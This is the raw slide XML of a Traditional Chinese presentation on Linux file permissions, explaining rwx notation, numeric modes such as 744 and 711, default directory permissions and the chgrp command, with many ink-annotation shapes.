          <p:cNvPr id="35" name="圖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188" y="1268760"/>
            <a:ext cx="7105623" cy="459577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5074920" y="1443600"/>
              <a:ext cx="70596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059080" y="1379880"/>
                <a:ext cx="7376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2697480" y="1535040"/>
              <a:ext cx="1803240" cy="7200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81640" y="1471320"/>
                <a:ext cx="183492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筆跡 5"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6910200" y="1521720"/>
              <a:ext cx="71244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94360" y="1458360"/>
                <a:ext cx="7441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筆跡 6"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6531480" y="1743840"/>
              <a:ext cx="1894320" cy="78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515640" y="1680480"/>
                <a:ext cx="192600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筆跡 7"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1064520" y="1992240"/>
              <a:ext cx="1065240" cy="262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48680" y="1928520"/>
                <a:ext cx="10969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筆跡 8"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="960120" y="2743200"/>
              <a:ext cx="1182600" cy="266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44280" y="2679840"/>
                <a:ext cx="12142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筆跡 9"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4075560" y="2514600"/>
              <a:ext cx="3057120" cy="266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059720" y="2451240"/>
                <a:ext cx="308880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筆跡 10"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3840480" y="4356360"/>
              <a:ext cx="2867760" cy="594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824640" y="4293000"/>
                <a:ext cx="28994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筆跡 11"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4160520" y="5421240"/>
              <a:ext cx="3142080" cy="6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144680" y="5357520"/>
                <a:ext cx="3173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筆跡 12"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="705600" y="0"/>
              <a:ext cx="1815840" cy="152208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89400" y="-63360"/>
                <a:ext cx="1847880" cy="164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筆跡 13"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5029200" y="3285360"/>
              <a:ext cx="771120" cy="1047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013360" y="3221640"/>
                <a:ext cx="802800" cy="23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431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400" dirty="0"/>
              <a:t>檔案權限（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" err="1" smtClean="0"/>
              <a:t>rw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>-r-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0"/>
              <a:t>-r--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>）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權限表示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2774130"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="827584" y="2204864"/>
          <a:ext cx="7632845" cy="34995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3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9389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74896"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權限項目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檔案類型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讀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寫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執行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讀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寫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執行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讀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寫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執行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4896"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字符表示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4896"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數字表示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4896"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權限分配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TW" altLang="en-US" dirty="0" smtClean="0"/>
                        <a:t>檔案擁有者</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
                        <a:t>u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TW" altLang="en-US" dirty="0" smtClean="0"/>
                        <a:t>檔案所屬群組</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p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zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
                        <a:t>其他用戶</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
                        <a:t>o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2324160" y="4343400"/>
              <a:ext cx="1651320" cy="3369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14800" y="4334040"/>
                <a:ext cx="1670040" cy="35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筆跡 6"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2216160" y="3232080"/>
              <a:ext cx="22896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00320" y="3168720"/>
                <a:ext cx="2606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筆跡 7"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2800440" y="3251160"/>
              <a:ext cx="540000" cy="766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784600" y="3187800"/>
                <a:ext cx="57168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筆跡 8"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3657600" y="3225960"/>
              <a:ext cx="375120" cy="190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641760" y="3162240"/>
                <a:ext cx="40680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筆跡 9"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2368440" y="4140360"/>
              <a:ext cx="1626120" cy="19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52600" y="4076640"/>
                <a:ext cx="165780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筆跡 10"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2325240" y="5042160"/>
              <a:ext cx="128052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09400" y="4978800"/>
                <a:ext cx="13122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筆跡 11"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4964040" y="5068440"/>
              <a:ext cx="882000" cy="6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948200" y="5004720"/>
                <a:ext cx="9136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筆跡 12"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6753600" y="5061960"/>
              <a:ext cx="8532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737760" y="4998240"/>
                <a:ext cx="1170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筆跡 13"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6557760" y="5035680"/>
              <a:ext cx="718560" cy="201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41560" y="4972320"/>
                <a:ext cx="7506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筆跡 14"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6394320" y="5316480"/>
              <a:ext cx="261720" cy="201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378480" y="5253120"/>
                <a:ext cx="2934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筆跡 15"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4402080" y="5290560"/>
              <a:ext cx="144360" cy="68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386240" y="5226840"/>
                <a:ext cx="1760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筆跡 16"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2142360" y="5303520"/>
              <a:ext cx="320400" cy="133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126520" y="5240160"/>
                <a:ext cx="35208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838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59338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>遵循上述法則</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>rwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>合起來就是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>4 + 2 + 1 = 7, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>一個 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>rwxrwxrwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>權限全開的檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>用數字來表示就是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>"777"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>；而完全不開放權限的檔案 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>"---------", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>它的數字標示則為 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>"000"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>。底下我們再舉幾個例子說明：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>rwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>------</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：等於數字標示 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>700 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>rwxr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>--r--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：等於數字標示 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>744</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>rw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>rw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>-r-x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：等於數字標示 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>665</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>drwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>--x--x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：等於數字標示 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>711</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>drwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>------</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：等於數字標示 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>700 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>。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使用數字法更改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-355680" y="285840"/>
              <a:ext cx="2032560" cy="6224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371520" y="222120"/>
                <a:ext cx="2064240" cy="74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6718320" y="1428840"/>
              <a:ext cx="153072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02480" y="1365120"/>
                <a:ext cx="15624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743040" y="1911240"/>
              <a:ext cx="559080" cy="640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27200" y="1847880"/>
                <a:ext cx="5907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886200" y="2493000"/>
              <a:ext cx="857520" cy="792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870360" y="2429640"/>
                <a:ext cx="8892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628720" y="2014560"/>
              <a:ext cx="197208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612880" y="1950840"/>
                <a:ext cx="2003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336040" y="2979000"/>
              <a:ext cx="1207440" cy="572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20200" y="2915280"/>
                <a:ext cx="1239480" cy="18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4983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200" dirty="0"/>
              <a:t>我們舉些範例說明會更清楚：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1"/>
              <a:t>rwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>------</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>：檔案擁有者對檔案具有讀取、寫入與執行的權限。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1"/>
              <a:t>rwxr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>--r--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>：檔案擁有者具有讀、寫與執行的權限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>同群組及其他使用者則具有讀取的權限。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1"/>
              <a:t>rw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1"/>
              <a:t>rw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>-r--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>：檔案擁有者與同群組的使用者對檔案具有讀寫的權限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>而其他使用者僅具有讀取的權限。</a:t>
            </a:r>
          </a:p>
          <a:p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一般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30080" y="355680"/>
              <a:ext cx="1423080" cy="18864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14240" y="291960"/>
                <a:ext cx="1454760" cy="201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5232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 err="1"/>
              <a:t>drwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>--x--x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>：目錄擁有者具有讀、寫與進入目錄的權限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>同群組及其他使用者僅能進入該目錄</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>卻無法讀取檔案列表。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1"/>
              <a:t>drwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>------</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>：除了目錄擁有者具有完整的權限之外</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>同群組與其他使用者對該目錄沒有任何權限。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW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一般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0169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859338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>每個使用者都擁有自己的家目錄</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>這些目錄通常集中放置於 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>/home </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>目錄下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>這些家目錄的預設權限為 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1"/>
              <a:t>drwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>------", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>表示目錄擁有者本身具備全部權限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>而同群組與其他使用者對該目錄則沒有任何權限：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW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一般權限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45024"/>
            <a:ext cx="7632848" cy="306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筆跡 2"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="7607160" y="1930320"/>
              <a:ext cx="889560" cy="6408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91320" y="1866960"/>
                <a:ext cx="9212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1333440" y="2400480"/>
              <a:ext cx="4121640" cy="1270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17600" y="2336760"/>
                <a:ext cx="415332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1850400" y="1428480"/>
              <a:ext cx="1164600" cy="1076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834200" y="1365120"/>
                <a:ext cx="1196640" cy="23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3464640" y="1428480"/>
              <a:ext cx="2979360" cy="21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48800" y="1365120"/>
                <a:ext cx="301104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3836160" y="1842840"/>
              <a:ext cx="2379240" cy="147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820320" y="1779480"/>
                <a:ext cx="241092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6564960" y="2414520"/>
              <a:ext cx="146484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549120" y="2351160"/>
                <a:ext cx="14965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7879680" y="2414520"/>
              <a:ext cx="428760" cy="216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863840" y="2351160"/>
                <a:ext cx="46044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1771560" y="2878920"/>
              <a:ext cx="350640" cy="216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755720" y="2815200"/>
                <a:ext cx="38232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3" name="筆跡 12"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2543040" y="2871720"/>
              <a:ext cx="1693440" cy="1004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527200" y="2808360"/>
                <a:ext cx="172512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4" name="筆跡 13"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3755520" y="4258440"/>
              <a:ext cx="78840" cy="20970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739680" y="4195080"/>
                <a:ext cx="110520" cy="222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0777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當我們以管理者帳號 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>(root) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>執行 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1"/>
              <a:t>mkdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>指令建立目錄時</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>新建目錄的權限預設為 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1"/>
              <a:t>rwxr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1"/>
              <a:t>xr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>-x", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>使用一般使用者帳號執行 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1"/>
              <a:t>mkdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>指令時</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>新建目錄的權限則預設為 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1"/>
              <a:t>rwxrwxr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>-x"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>。建好目錄後</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>您可以視實際需求而定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>自行變更目錄的權限</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3200" dirty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一般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4540320" y="1587600"/>
              <a:ext cx="3143520" cy="828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24480" y="1523880"/>
                <a:ext cx="317520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511440" y="2019240"/>
              <a:ext cx="1054440" cy="766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95600" y="1955880"/>
                <a:ext cx="108612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263760" y="2050920"/>
              <a:ext cx="7880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47920" y="1987560"/>
                <a:ext cx="819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251320" y="2050920"/>
              <a:ext cx="660960" cy="57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235480" y="1987560"/>
                <a:ext cx="69264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994360" y="2019240"/>
              <a:ext cx="527400" cy="320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978520" y="1955880"/>
                <a:ext cx="5590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7385040" y="2050920"/>
              <a:ext cx="813240" cy="576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369200" y="1987560"/>
                <a:ext cx="8449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977760" y="2590920"/>
              <a:ext cx="565560" cy="64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61920" y="2527200"/>
                <a:ext cx="5972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870280" y="2527200"/>
              <a:ext cx="1683000" cy="576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854440" y="2463840"/>
                <a:ext cx="17146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6559560" y="2540160"/>
              <a:ext cx="952920" cy="320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43720" y="2476440"/>
                <a:ext cx="9846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5753160" y="2558880"/>
              <a:ext cx="546480" cy="385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737320" y="2495520"/>
                <a:ext cx="5781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3943440" y="3022560"/>
              <a:ext cx="1765440" cy="194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927600" y="2959200"/>
                <a:ext cx="179712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6388200" y="3009960"/>
              <a:ext cx="1492560" cy="64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372360" y="2946240"/>
                <a:ext cx="152424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3543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/>
              <a:t>chgrp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>可</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>把檔案或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0"/>
              <a:t>目錄訪問權限轉給</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>其他群組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chgrp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>群組名稱</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3400" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3400" dirty="0" smtClean="0"/>
              <a:t>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檔案名稱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R:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0"/>
              <a:t>進連同次目錄下的所有檔案都</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
